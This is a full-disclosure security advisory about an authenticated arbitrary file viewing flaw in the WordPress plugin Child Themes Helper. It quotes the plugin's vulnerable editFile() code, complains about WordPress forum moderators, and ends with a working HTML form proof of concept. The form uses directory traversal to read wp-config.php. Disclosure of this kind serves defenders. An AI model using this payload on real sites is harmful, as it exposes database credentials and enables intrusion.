Full Disclosure of Authenticated Arbitrary File Viewing Vulnerability in Child Themes Helper
In our previous post we detailed an authenticated arbitrary file upload that our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities caught in the plugin Child Themes Helper. It looks like there is quite a bit of inadequately secured code in the plugin, but one other issue that stood out is an authenticated arbitrary file viewing vulnerability.
The plugin makes the function editFile() available to those logged in to WordPress:
383 | add_action( 'wp_ajax_editFile', Array( $pas_cth_AJAXFunctions, "editFile" ) ); |
That function will display the contents of an arbitrary file:
977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 | function editFile() { $inputs = [ 'directory' => sanitize_text_field( $_POST['directory'] ), 'file' => sanitize_file_name( $_POST['file'] ), 'themeType' => sanitize_text_field( $_POST['themeType'] ), ]; switch (strtolower($inputs['themeType'])) { case PAS_CTH_CHILDTHEME: $file = $this->activeThemeInfo->childThemeRoot . PAS_CTH_SEPARATOR . $this->activeThemeInfo->childStylesheet . PAS_CTH_SEPARATOR . $inputs['directory'] . PAS_CTH_SEPARATOR . $inputs['file']; $readOnly = 'false'; break; case PAS_CTH_TEMPLATETHEME: $file = $this->activeThemeInfo->templateThemeRoot . PAS_CTH_SEPARATOR . $this->activeThemeInfo->templateStylesheet . PAS_CTH_SEPARATOR . $inputs['directory'] . PAS_CTH_SEPARATOR . $inputs['file']; $readOnly = 'true'; break; } $inputs['readOnlyFlag'] = $readOnly; $fileContents = stripslashes(str_replace(">", ">", str_replace("<", "<", file_get_contents($file)))); echo "EDITFILEOUTPUT:{"; echo "ARGS<:>" . json_encode($inputs); echo '+|++|+'; echo "EDITBOX<:>{$fileContents}"; |
What is missing from that code is a restriction on what users can access that code and probably protection against directory traversal.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Proof of Concept
The following proof of concept will display the contents of the WordPress configuration file, when logged in to WordPress and when a child theme has been selected in the plugin’s options.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=editFile" method="POST"> <input type="hidden" name="themeType" value="child" /> <input type="hidden" name="directory" value="../../../" /> <input type="hidden" name="file" value="wp-config.php" /> <input type="hidden" name="fileContents" value="[file contents]" /> <input type="submit" value="Submit" /> </form> </body> </html>